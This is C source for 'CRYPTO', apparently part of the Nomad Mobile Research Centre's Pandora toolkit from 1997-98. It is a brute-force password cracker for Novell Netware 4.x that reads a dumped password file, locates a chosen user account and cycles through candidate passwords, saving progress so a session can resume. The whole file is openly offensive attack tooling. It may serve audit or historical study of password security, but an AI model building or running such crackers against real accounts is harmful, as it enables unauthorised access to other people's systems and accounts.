#include <stdlib.h>
#include <string.h>
#include "..\pandora\pan_hash.h"
#include "..\pandora\pan_file.h"

#define DEF_FILE "RESTORE.PAN"

/*
 * print usage if needed
 */
void printHelp(int j, char *w)
{
   if (j==2) printf("No argument given for option -%s\n\n",w);
   printf("USAGE: crypto <options>\n");
   printf("  -a            ALPHA characters (A-Z) only.\n");
   printf("  -b            BOTH alpha and numeric (A-Z,0-9).\n");
   printf("  -f            FIRST password to try (cannot be used during restore)\n");
   printf("  -h            This HELP screen\n");
   printf("  -r            RESTORE a previous brute force attack.\n");
   printf("  -r <filename> RESTORE from the specified filename.\n");
   printf("  -s <filename> SAVE periodically to filename for later restore.\n");
   printf("  -u <username> Attack the USER specified (username is case sensitive).\n\n");
   printf("EXAMPLES:\n");
   printf("  crypto -r\n");
   printf("  crypto -u Admin\n\n");
   exit(j);
}

/*
 * Main prog
 */
int main(int argc, char *argv[])
{
   Pan_PassHack pPassHack;
   Pan_PassList pPassList,q;
   int err,ret,i,t,save=FALSE,restore=FALSE,first=FALSE,FOUND;
   short lengh,maxtry=PAN_KEYSPACE;
   char *account=(char *)calloc(1,sizeof(char)*MAX_CHARS),
        *firsttry=(char *)calloc(1,sizeof(char)*MAX_CHARS),
        *restfile=(char *)calloc(1,sizeof(char)*MAX_CHARS),
        *savefile=(char *)calloc(1,sizeof(char)*MAX_CHARS),
        *trypw=(char *)calloc(1,sizeof(char)*16);

   /* say hello... */
   printf("CRYPTO - Netware 4.x brute force password cracker\n");
   printf("Comments/bugs: pandora@nmrc.org\n");
   printf("http://www.nmrc.org/pandora\n");
   printf("1997,1998 (c) Nomad Mobile Research Centre\n\n");

   if (argc<2) printHelp(1,NULL);

   /* process the command line */
   for (i=1 ; i<argc ; i++)
   {
      if (argv[i][0]=='-')
	 switch(argv[i][1])
	 {
            case 'a':
            case 'A':
               maxtry=PAN_ASCII;
               break;
            case 'b':
            case 'B':
               maxtry=PAN_ALPHANUM;
               break;
            case 'f':
            case 'F':
               first=TRUE;
               if ((i+1>argc) || (argv[i+1]==NULL)) printHelp(2,"f");
               if (argv[i+1][0]=='-') printHelp(2,"f");
               sprintf(firsttry,"%s",argv[i+1]);
               break;
            case 'r':
	    case 'R':
               restore=TRUE;
               if ((i+1>argc) || (argv[i+1]==NULL))
               {
                  strcpy(restfile,DEF_FILE);
                  break;
               }
               if (argv[i+1][0]=='-')
               {
                  strcpy(restfile,DEF_FILE);
                  break;
               }
               sprintf(restfile,"%s",argv[i+1]);
	       break;
            case 's':
            case 'S':
               if ((i+1>argc) || (argv[i+1]==NULL)) printHelp(2,"s");
               if (argv[i+1][0]=='-') printHelp(2,"s");
               sprintf(savefile,"%s",argv[i+1]);
               save=TRUE;
               break;
	    case 'u':
	    case 'U':
               if ((i+1>argc) || (argv[i+1]==NULL)) printHelp(2,"u");
               if (argv[i+1][0]=='-') printHelp(2,"u");
	       sprintf(account,"%s",argv[i+1]);
	       break;
	    case 'h':
	    case 'H':
	    case '?':
	       printHelp(0,NULL);
	    default:
	       printf("Invalid option: %s\n", argv[i]);
	       printHelp(1,NULL);
	 }
   }

 if(save==FALSE && restore==FALSE) sprintf(savefile,"%s",DEF_FILE);
 if(save==FALSE && restore==TRUE) sprintf(savefile,"%s",restfile);
 if(first==TRUE && restore==TRUE)
 {printf("You cannot use -r and -f together.\n\n");
  printHelp(1,NULL);
 }

  /* if we aren't restoring a past brute force attack,
     we must find the user's info and set things up */
 if(restore==FALSE)
  {
   /** Search&Read the record **/
   err=Pan_PassList_read("PASSWORD.NDS",&pPassList);
   if (err) {printf("Error value : %d",err);
             Pan_PassList_free(pPassList);
             exit(-1);
            }
   for (q=pPassList;q!=NULL;q=q->next)
   {
    FOUND=TRUE;
    for (i=0;i<strlen(account);i++)
     {t=i*2+6;
      if (account[i]!=q->userCN[t]) FOUND=FALSE;
     }
    if (FOUND==TRUE) break;
   }
   if (!q)
    {printf("%s not found in password file.\n",account);
     Pan_PassList_free(pPassList);
     exit(1);
    }
   Pan_PassList_to_PassHack(q,&pPassHack);
   Pan_PassList_free(pPassList);
   lengh=(short)pPassHack.pwlen;
   /** Is a first word given ? **/
   if (first==TRUE)
    {
     if (lengh!=strlen(firsttry))
      {printf("%s is %d characters in length.\n",firsttry,lengh);
       exit(1);
      }
     for (i=0;i<lengh;i++) trypw[i]=firsttry[i];
     trypw[i]='\0';
    }
   else
    {
     for (i=0;i<lengh;i++) trypw[i]='A';
     trypw[i]='\0';
    }
   for(i=0;i<lengh;i++) pPassHack.pw_first[i]=trypw[i];
   for(i=0;i<lengh;i++) pPassHack.pw_current[i]=NULL;
   pPassHack.pw_last=NULL;
   printf("Starting brute force...\n");
  }
  /* if restoring a past brute force attempt, read in where we
     left off, reset the try_index array, and start processing */
 else
  {
    err=Pan_PassHack_read(restfile,&pPassHack);
    if (err) {printf("Error value : %d",err);
              exit(-1);
             }
    lengh=(short)pPassHack.pwlen;
    printUnicodeName(pPassHack.userCN,258);
    printf("'s password brute force session restored.\n");
    printf("First attempt - %s\n",pPassHack.pw_first);
    printf("Current attempt - %s\n",pPassHack.pw_current);
    printf("Limit - %c\nContinuing brute force...\n",pPassHack.pw_last);
  }

  /* tell the hacker why the screen looks hung... */
  printf("Press CTRL-C or CTRL-BREAK to stop...\n");

  do {
      ret=Pan_Brute_Force(&pPassHack,maxtry,&trypw,3000000);
      err=Pan_PassHack_write(savefile,&pPassHack);
      if (err) exit(err);
      system("echo .");
     } while (ret==-106); /* return value of -106 means limit reached but */
                          /* password not found yet and maxtry no exceeded */

  if (ret) printf("\n\nError value : %d",ret);
   else printf("\n\nPassword is : %s",trypw);
} 
